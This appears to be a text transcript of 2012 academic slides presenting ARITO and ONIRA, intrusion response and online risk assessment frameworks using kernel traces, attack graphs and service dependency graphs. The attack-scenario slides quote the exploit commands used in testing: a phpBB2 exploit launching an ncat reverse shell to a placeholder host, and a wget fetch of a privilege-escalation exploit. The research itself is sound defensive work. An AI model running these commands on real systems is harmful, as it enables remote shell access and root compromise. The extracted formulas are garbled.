system health monitoring and proactive response activation filesystem health monitoring and...
TRANSCRIPT
System Health Monitoring and Proactive Response Activation
Alireza Shameli-Sendi
Michel Dagenais
December 6, 2012École Polytechnique, Montreal
2/23
Content
ARITO: Cyber-Attack Response System Using Accurate Risk Impact Tolerance
ONIRA: Online Intrusion Risk Assessment of Distributed Traces Using Dynamic Attack Grpah
Two Frameworks for IRS:
3/23
Achievement
Eclipse Framework:
– Prediction Algorithm
– Risk Assessment Algorithm
– Response System
• ORCEF– Static Risk Assessment
• ARITO – Improves ORCEF by adding online risk assessment
– There is not any relationship between services
–
• ONIRA– Improves ARITO by considering attack impact propagation in service dependency graph
Prediction ORCEF
2010
2011
ARTIO ONIRA
2012
Risk Assessment
Response System
ImprovesImproves
4/23
ARITO: Cyber-Attack Response System Using Accurate Risk Impact Tolerance
5/23
ARITO Features
ARITO is an Intrusion Response System consists of: Risk Assessment module Response Activation module Response Deactivation module Response Coordinator module which measures the response
goodness
6/23
Response System in ARITO
Instantaneous Sustained Reversible Sustained irreversible
Start Time Life Time
Category
Attribute
Activation Deactivation
Concept
7/23
How ARITO works
Under the threshold and before the response is applied
Above the threshold- Response coordinator selects instantaneous response at first
Under the threshold and after the responses have been applied- The risk is initialized to a level below the threshold (φ)
Scenario:
RI c =RI p +RI n
8/23
Response Goodness
φ is dynamic, and is based on how successful the response was in repelling the attack
The best response goodness is 2, when we not only have success values in the current window, but also in all previous windows
Scenario:
φ=T a −T a
2−
RG
GmaxGmin∗T a
Goodness wk =
∑i = 1
n
S i−∑j = 1
m
F j
∑i = 1
n
S i∑j = 1
m
F j
2 k−1
RG=∑k=1
n
Goodness wk −2<RG<+2
Best RG=11/21/41/8.. .≃ 2
9/23
Attack Scenario
The steps have been grouped into five phases:
Probing Exploit phpBB2 Upload exploit Exploit Linux kernel 2.6.37 to obtain root Install a permanent access
10/23
Abstracted Trace of Attack Scenario and Detection of Each Step
A
A: web application scanB: apache executes shellC: shell executes ncatD: ncat connects to remote host
B
C
DE
E: ncat executes shellF: shell executes wgetG: shell executes ccH: shell executes exploit
F
G
H
M
K
M: exploit executes shellN: shell executes adduserK: shell is root
Trace
Alert
N
11/23
Results
Risk Impact Tolerance
G
H
A A A BCDE
F
M
N
K
C1: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 ”ncat -e /bin/sh x.x.x.x 9999”C2: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 ”wget x.x.x.x/LPE.c -O /tmp/LPE.c”C3: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1"/tmp/LPE"
A: web application scanB: apache executes shellC: shell executes ncatD: ncat connects to remote hostE: ncat executes shellF: shell executes wgetG: shell executes ccH: shell executes exploitM: exploit executes shellN: shell executes adduserK: shell is root
RI C >T a
newlevel φ
R1: CLOSE_A_NET_CONNECTIONR2: KILL_PROCESSR3: RESTART_DAEMONR4: RESET(machine)R5: NOT_ALLOWED_HOST(attacker IP)R6: R_BLOCK_RECEIVER_PORT
R6R5
R4
R3
R1R2
Command
Alert
Response
C1C1C2C3 C2 C2
12/23
ARITO Performance in Real-Time
The reaction delay time:
∆t(detection) takes between 50 ms and 100 ms Risk assessment takes less than 6 ms The decision is made in less than 5 ms, so R1 = R_CLOSE_A NET_CONNECTION reaction_delay(2) takes 81 ms The framework is fast enough to stop the attack in real-time
reactiondelay i =∆t detection i +t risk i +t decision i +t response i ∆t detection i =tdi−ti
reactiondelay i t≃ response i
13/23
Conclusion (ARITO)
ARITO proposes a perfect coordination between the risk assessment mechanism and the response system which leds to have an efficient framework that is able to:
Prevent unnecessary responses Perform response activation and deactivation Consider the user needs in term of QoS
14/23
ONIRA: Online Intrusion Risk Assessment of Distributed Traces Using Dynamic Attack Graph
15/23
ONIRA Features
Present multi-step attack detection from LTTng trace using attack graph
Dynamic attack cost calculation based on attack graph and service dependency graph
In service dependency graph calculation is based on impact propagation
16/23
Attack Modeling
LAMBDA Language is used for each state Some attributes have been added to LAMBDA language
Knowledge level CIA effects
A Language to Model a Database for Detection of Attacks
*
*
17/23
Service Dependency Graph Modeling
For each service S three properties are defined: C(S), I(S), and A(S)
Two edges are available between each two services:
Forward edge loss Backward edge loss
• Mandatory type dependency
– Not able to continue working
– Impact on Confidentiality
– Impact on Integrity
Impact S i =DirectImpact Si +ForwardImpact Si +BackwardImpact S i
18/23
Attack Cost Model
Knowledge Level (κ) Attack frequency (θ) Effect on CIA (∆max) Service value (ξ)
Parameters
State2
State3
State4
State1
Attack Graph
Service Dependency Graph
19/23
Attack Cost Model
Ψ=α×κ+β×θ+γ×ξ+δ×∆max
Knowledge Level
Attack Cost
κ= the number of skipped statesthe number of knowledge states
∆Cmax=max x .ConfidentialityLoss
∀x executed step in attack graph∈
∆ I max=max x . IntegrityLoss
∆ Amax=max x . AvailabilityLoss
∆max=∆Cmax
+∆ Imax+∆A max
3
Effect on CIA
Κ [0 - 1]∈
Θ ∈ [0- ꝏ]
∆max ∈ [0 - 1]
ξ ∈ [0 - 1]
20/23
ONIRA Architecture
21/23
Result (Attack Modeling)
Probing
ncat
wget
cc
exploit
AddUser
Start KL= Yes
End
KL= No
KL= Yes
KL= Yes
KL= No
KL= NoResponse
KL= No
fs.exec: 18322, 18322, /bin/sh, , 12830, 0x0, SYSCALL { filename = "/bin/sh" }
fs.exec: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { filename = "/usr/bin/ncat" }
net.socket_connect: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { fd = 3, uservaddr = 0x80640a0, addrlen = 16, ret = -115 }
./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "ncat -e /bin/sh x.x.x.x 9999"
22/23
Result (Attack Modeling)
Probing
ncat
wget
cc
exploit
AddUser
Start KL= Yes
End
KL= No
KL= Yes
KL= Yes
KL= No
KL= NoResponse
KL= No
> ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "wget x.x.x.x/LPE.c -O /tmp/LPE.c"
> ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1"ncat -e /bin/sh x.x.x.x 9999"> wget x.x.x.x/LPE.c
23/23
Result (Framework)
ONIRA Framework in Eclipse
24/23
Results
Scenario 1: The intruder runs all steps of multi-step
attack even in the second time Scenario 2:
t1: all steps t2: skips three states: probing, wget, and
cc Scenario 3:
t1: skips two states: probing and cc t2: skips three states: probing, upload, and
cc t3: runs all steps
25/23
ONIRA Performance in Real-Time
The total cost of generating trace events, reading events, and pattern matching takes about 60 ms for this multi-step attack scenario
For this trace, generated at a rate of 385KB/Sec, storing the state information in the SHD takes 70 ms
The retrieving information from the SHD takes 60 ms Checking the preconditions of five states takes 200 ms The risk assessment component takes less than 10 ms Decision is made in less than 3 ms In worst case, ONIRA framework
takes 343 ms
26/23
Conclusion (ONIRA)
ONIRA proposes a framework to calculate attack cost using dynamic attack graph in live mode based on using kernel-level events
ONIRA benefits service dependency graph to compute damage cost based on three concepts; direct impact, forward impact, and backward impact
ONIRA calculates accurate attack cost based on information provided by service dependency and attack graphs
27/23
System Health Monitoring and Proactive Response Activation
www.lttng.org
Thank You
DORSAL
E-Mail: